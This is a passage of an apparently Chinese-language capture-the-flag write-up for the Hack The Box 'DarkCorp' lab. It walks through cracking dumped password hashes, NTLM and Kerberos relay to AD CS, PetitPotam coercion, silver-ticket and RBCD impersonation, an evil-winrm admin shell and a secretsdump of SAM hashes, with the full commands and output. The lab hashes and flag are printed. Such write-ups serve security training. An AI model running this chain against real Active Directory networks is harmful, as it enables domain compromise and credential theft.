SET client_min_messages = warning;
SET row_security = off;
SET default_tablespace = '';
SET default_table_access_method = heap;
--
-- Name: Admins; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Admins" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80)
);
ALTER TABLE public."Admins" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Admins_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Admins_id_seq" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Admins_id_seq" OWNED BY public."Admins".id;
--
-- Name: Users; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Users" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80),
host_header character varying(255),
ip_address character varying(80)
);
ALTER TABLE public."Users" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Users_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Users_id_seq" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Users_id_seq" OWNED BY public."Users".id;
--
-- Name: Admins id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins" ALTER COLUMN id SET DEFAULT nextval('public."Admins_id_seq"'::regclass);
--
-- Name: Users id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users" ALTER COLUMN id SET DEFAULT nextval('public."Users_id_seq"'::regclass);
--
-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Admins" (id, username, password, email) FROM stdin;
>>>> 1 bcase dc5484871bc95c4eab58032884be7225 bcase@drip.htb
>>>> 2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 victor.r@drip.htb
>>>> 3 ebelford 8bbd7f88841b4223ae63c8848969be86 ebelford@drip.htb
\.
--
-- Data for Name: Users; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Users" (id, username, password, email, host_header, ip_address) FROM stdin;
5001 support d9b9ecbf29db8054b21f303072b37c4e support@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5002 bcase 1eace53df87b9a15a37fdc11da2d298d bcase@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5003 ebelford 0cebd84e066fd988e89083879e88c5f9 ebelford@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
\.
--
-- Name: Admins_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Admins_id_seq"', 1, true);
--
-- Name: Users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Users_id_seq"', 5003, true);
--
-- Name: Admins Admins_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins"
ADD CONSTRAINT "Admins_pkey" PRIMARY KEY (id);
--
-- Name: Users Users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users"
ADD CONSTRAINT "Users_pkey" PRIMARY KEY (id);
--
-- Name: TABLE "Admins"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Admins" TO dripmail_dba;
--
-- Name: SEQUENCE "Admins_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Admins_id_seq" TO dripmail_dba;
--
-- Name: TABLE "Users"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Users" TO dripmail_dba;
--
-- Name: SEQUENCE "Users_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Users_id_seq" TO dripmail_dba;
--
-- PostgreSQL database dump complete
--postgres@drip:/var/backups/postgres$
可以获取到三个用户的md5
dc5484871bc95c4eab58032884be7225
cac1c7b0e7008d67b6db40c03e76b9c0
8bbd7f88841b4223ae63c8848969be86
可以获取到victor.r@drip.htb的密码 victor1gustavo@#
1.5. Internal Status Monitor
使用此密码可以登录到Internal Status Monitor
这是一个内网主机状态监测网站
看到这个很容易就想到可以进行NTLMRelay ,之前肯定是遇到过的类似的,但我现在想不起来了
此外此凭据也可以登录到域内
┌──(root㉿kali)-[/usr/share/responder]
└─# nxc smb 172.16.20.1 -u victor.r -p victor1gustavo@#
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
1.5.1. ntlm relay
先配置一下burp认证
然后抓个包看看
使用ligolo转发端口
[Agent : ebelford@drip] » listener_add --tcp --addr 0.0.0.0:8080 --to 10.10.14.86:80
INFO[0085] Listener 0 created on remote agent!
可以nc测试一下
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.14.86] 54606
GET / HTTP/1.1
Host: drip.darkcorp.htb:8080
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
没问题的
使用Responder捕获Net-NTLMv2 哈希
这里由于我的responder有问题,没法获取到此Net-NTLMv2哈希
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.11.54
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash : svc_acc::darkcorp:ffdb62442934ec99:63F597E3C5D438360354CF490724F368:01010000000000008CE06A82563DDC01DABD37CC5F38A9F30000000002000800370048004100310001001E00570049004E002D00440054005500410034004400570032005800490044000400140037004800410031002E004C004F00430041004C0003003400570049004E002D00440054005500410034004400570032005800490044002E0037004800410031002E004C004F00430041004C000500140037004800410031002E004C004F00430041004C00080030003000000000000000000000000030000031EC7482A518E93073DC620355271849187E5AAAD9F26F57289D7D78892794DE0A0010000000000000000000000000000000000009002C0048005400540050002F0064007200690070002E006400610072006B0063006F00720070002E006800740062000000000000000000
如果顺利的话,可以获取到一个这样的hash,但是无法crack
1.6. SMB
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -u victor.r -p 'victor1gustavo@#' --shares
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
SMB 172.16.20.1 445 DC-01 [*] Enumerated shares
SMB 172.16.20.1 445 DC-01 Share Permissions Remark
SMB 172.16.20.1 445 DC-01 ----- ----------- ------
SMB 172.16.20.1 445 DC-01 ADMIN$ Remote Admin
SMB 172.16.20.1 445 DC-01 C$ Default share
SMB 172.16.20.1 445 DC-01 CertEnroll READ Active Directory Certificate Services share
SMB 172.16.20.1 445 DC-01 IPC$ READ Remote IPC
SMB 172.16.20.1 445 DC-01 NETLOGON READ Logon server share
SMB 172.16.20.1 445 DC-01 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-smbclient -k DC-01.darkcorp.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use CertEnroll
# ls
drw-rw-rw- 0 Sun Jan 18 07:37:18 2026 .
drw-rw-rw- 0 Sun Dec 29 18:38:06 2024 ..
-rw-rw-rw- 990 Sun Jan 18 07:37:18 2026 DARKCORP-DC-01-CA+.crl
-rw-rw-rw- 1184 Sat Jan 17 07:37:18 2026 DARKCORP-DC-01-CA.crl
-rw-rw-rw- 1436 Wed Jan 22 07:18:28 2025 DC-01.darkcorp.htb_DARKCORP-DC-01-CA(1).crt
-rw-rw-rw- 1397 Sun Dec 29 18:34:10 2024 DC-01.darkcorp.htb_DARKCORP-DC-01-CA.crt
>>>> -rw-rw-rw- 328 Sun Dec 29 18:38:06 2024 nsrev_DARKCORP-DC-01-CA.asp
#
没啥用用的东西,都是一些公钥,但可以说明这台机器是存在ADCS的
1.7. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# rusthound-ce -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb --zip
---------------------------------------------------
Initializing RustHound-CE at 09:39:57 on 01/18/26
Powered by @g0h4n_0
---------------------------------------------------
[2026-01-18T14:39:57Z INFO rusthound_ce] Verbosity level: Info
[2026-01-18T14:39:57Z INFO rusthound_ce] Collection method: All
[2026-01-18T14:39:57Z INFO rusthound_ce::ldap] Connected to DARKCORP.HTB Active Directory!
[2026-01-18T14:39:57Z INFO rusthound_ce::ldap] Starting data collection...
[2026-01-18T14:39:57Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:39:58Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=darkcorp,DC=htb
[2026-01-18T14:39:58Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:03Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=darkcorp,DC=htb
[2026-01-18T14:40:03Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:07Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=darkcorp,DC=htb
[2026-01-18T14:40:07Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:08Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=darkcorp,DC=htb
[2026-01-18T14:40:08Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:08Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=darkcorp,DC=htb
[2026-01-18T14:40:08Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 21%
[2026-01-18T14:40:08Z INFO rusthound_ce::objects::enterpriseca] Found 11 enabled certificate templates
[2026-01-18T14:40:08Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2026-01-18T14:40:08Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 13 users parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 62 groups parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 computers parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 4 ous parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 gpos parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 74 containers parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 aiacas parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 rootcas parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 33 certtemplates parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] .//20260118094008_darkcorp-htb_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 09:40:08 on 01/18/26! Happy Graphing!
1.8. Web-01$
1.8.1. kerberos relay
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# certipy find -u victor.r -p 'victor1gustavo@#' -dc-ip 172.16.20.1 -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'DARKCORP-DC-01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'DARKCORP-DC-01-CA'
[*] Checking web enrollment for CA 'DARKCORP-DC-01-CA' @ 'DC-01.darkcorp.htb'
[!] Failed to check channel binding: NTLM not supported. Try using Kerberos authentication (-k and -dc-host).
[*] Enumeration output:
Certificate Authorities
0
CA Name : DARKCORP-DC-01-CA
DNS Name : DC-01.darkcorp.htb
Certificate Subject : CN=DARKCORP-DC-01-CA, DC=darkcorp, DC=htb
Certificate Serial Number : 27637AF630C1D39945283AF47C89040C
Certificate Validity Start : 2024-12-29 23:24:10+00:00
Certificate Validity End : 2125-01-22 12:18:28+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : True
Channel Binding (EPA) : Unknown
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : DARKCORP.HTB\Administrators
Access Rights
ManageCa : DARKCORP.HTB\Administrators
DARKCORP.HTB\Domain Admins
DARKCORP.HTB\Enterprise Admins
ManageCertificates : DARKCORP.HTB\Administrators
DARKCORP.HTB\Domain Admins
DARKCORP.HTB\Enterprise Admins
Enroll : DARKCORP.HTB\Authenticated Users
[*] Remarks
ESC8 : Channel Binding couldn't be verified for HTTPS Web Enrollment. For manual verification, request a certificate via HTTPS with Channel Binding disabled and observe if the request succeeds or is rejected.
Certificate Templates : [!] Could not find any certificate templates
1.8.2. Add DNS record
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc ldap 172.16.20.1 -u victor.r -p 'victor1gustavo@#'
LDAP 172.16.20.1 389 DC-01 [*] Windows Server 2022 Build 20348 (name:DC-01) (domain:darkcorp.htb)
(signing:None) (channel binding:Never)
LDAP 172.16.20.1 389 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
目标没有开启通道绑定和签名认证,这为我们进行Kerberos relay提供了前置条件
首先需要添加一个序列化SPN的DNS记录
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# bloodyAD -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -k --host DC-01.darkcorp.htb add dnsRecord DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 10, in <module>
sys.exit(main())
^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 342, in main
asyncio.run(amain())
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 195, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/base_events.py", line 691, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 272, in amain
output = await result
^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/cli_modules/add.py", line 378, in dnsRecord
await ldap.bloodyadd(record_dn, attributes=record_attr)
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 229, in bloodyadd
raise err
badldap.commons.exceptions.LDAPAddException: insufficientAccessRights for DC=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb (Attr) — Reason:(ERROR_ACCESS_DENIED) Access is denied.
使用bloodyAD添加DNS记录由于用户权限不足而报错
因为acc_svc是DNSADMINS组的成员,所以其肯定可以创建DNS记录,我们改用NTLMRelay进行添加DNS记录
ntlmrelayx.py -t 'ldap://172.16.20.1' --no-dump --no-smb-server --no-acl --no-da --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.86
开启监听后,在页面触发一次ntlm认证,转发来自 acc_svc的身份验证信息来创建此记录
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ntlmrelayx.py -t 'ldap://172.16.20.1' --no-dump --no-smb-server --no-acl --no-da --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.86
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] (HTTP): Client requested path: /
[*] (HTTP): Client requested path: /
[*] (HTTP): Client requested path: /
[*] (HTTP): Connection from 10.10.14.86 controlled, attacking target ldap://172.16.20.1
[*] (HTTP): Client requested path: /
[*] (HTTP): Authenticating connection from DARKCORP/SVC_ACC@10.10.14.86 against ldap://172.16.20.1 SUCCEED [1]
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Assuming relayed user has privileges to escalate a user via ACL attack
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.14.86` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
ebelford@drip:~$ nslookup dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.darkcorp.htb
Server: 172.16.20.1
Address: 172.16.20.1#53
Name: dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.darkcorp.htb
Address: 10.10.14.86
1.8.3. kerberos relay
下一步进行Kerberos relay
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
使用krbrelayx把kerberos认证从web-01中继到DC-01
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb WEB-01.darkcorp.htb -k --use-kcache -M coerce_plus
SMB WEB-01.darkcorp.htb 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB WEB-01.darkcorp.htb 445 WEB-01 [+] DARKCORP.HTB\victor.r from ccache
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PetitPotam
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PrinterBug
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PrinterBug
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, MSEven
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb WEB-01.darkcorp.htb -k --use-kcache -M coerce_plus -o L=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PetitPotam
SMB WEB-01.darkcorp.htb 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB WEB-01.darkcorp.htb 445 WEB-01 [+] DARKCORP.HTB\victor.r from ccache
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PetitPotam
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
由于我kali的python为3.13,其pyOpenSSL 库的版本比较新,生成.pfx文件时会报错,我使用uv来运行 krbrelayx来解决此问题
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
Installed 21 packages in 61ms
/root/Desktop/tools/krbrelayx/lib/servers/smbrelayserver.py:429: SyntaxWarning: invalid escape sequence '\%'
LOG.error("Authenticating against %s://%s as %s\%s FAILED" % (
/root/Desktop/tools/krbrelayx/lib/servers/smbrelayserver.py:441: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/root/Desktop/tools/krbrelayx/lib/servers/smbrelayserver.py:516: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/root/Desktop/tools/krbrelayx/lib/clients/__init__.py:17: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import os, sys, pkg_resources
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.232.7
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.129.232.7
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] HTTP server returned status code 200, treating as a successful login
[*] GOT CERTIFICATE! ID 7
[*] Writing PKCS#12 certificate to ./WEB-01.pfx
[*] Certificate successfully written to file
[*] Skipping user WEB-01$ since attack was already performed
然后使用certipy获取tgt
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# certipy auth -pfx WEB-01.pfx -dc-ip 172.16.20.1
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'WEB-01.darkcorp.htb'
[*] Security Extension SID: 'S-1-5-21-3432610366-2163336488-3604236847-20601'
[*] Using principal: 'web-01$@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'web-01.ccache'
[*] Wrote credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675
因为我们获取到了机器账号 web-01$的哈希, 我们可以通过RBCD来获取管理员的cache,
这里也可以获取silver ticket
1.9. shell as web01's Administrator
1.9.1. 方法1:silver ticket
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-ticketer -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-3432610366-2163336488-3604236847 -domain darkcorp.htb -spn cifs/WEB-01.darkcorp.htb administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkcorp.htb/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb WEB-01.darkcorp.htb -k --use-kcache
SMB WEB-01.darkcorp.htb 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB WEB-01.darkcorp.htb 445 WEB-01 [+] DARKCORP.HTB\administrator from ccache (Pwn3d!)
1.9.2. 方法2 RBCD
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-rbcd -action write -delegate-from 'WEB-01$' -delegate-to 'WEB-01$' -dc-ip 172.16.20.1 darkcorp.htb/'WEB-01$' -hashes ':8f33c7fc7ff515c1f358e488fbb8b675'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] WEB-01$ can now impersonate users on WEB-01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] WEB-01$ (S-1-5-21-3432610366-2163336488-3604236847-20601)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-getST -spn 'cifs/web-01.darkcorp.htb' -impersonate administrator 'darkcorp.htb/WEB-01$@DC-01.darkcorp.htb' -hashes :8f33c7fc7ff515c1f358e488fbb8b675
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_web-01.darkcorp.htb@DARKCORP.HTB.ccache
1.9.3. evil-winrm
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# evil-winrm -i WEB-01.darkcorp.htb -u administrator -H 88d84ec08dad123eb04a060a74053f21
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/5/2025 12:04 PM cleanup
d----- 1/16/2025 11:01 AM WindowsPowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/user.txt
a35e5767ab59b6582d20f21c9e30a1eb
*Evil-WinRM* PS C:\Users\Administrator\Documents>
终于拿到user了
2. System
2.1. shell as john.w
2.1.1. secrets dump
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-secretsdump -k -no-pass WEB-01.darkcorp.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4cf6d0e998d53752d088e233abb4bed6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
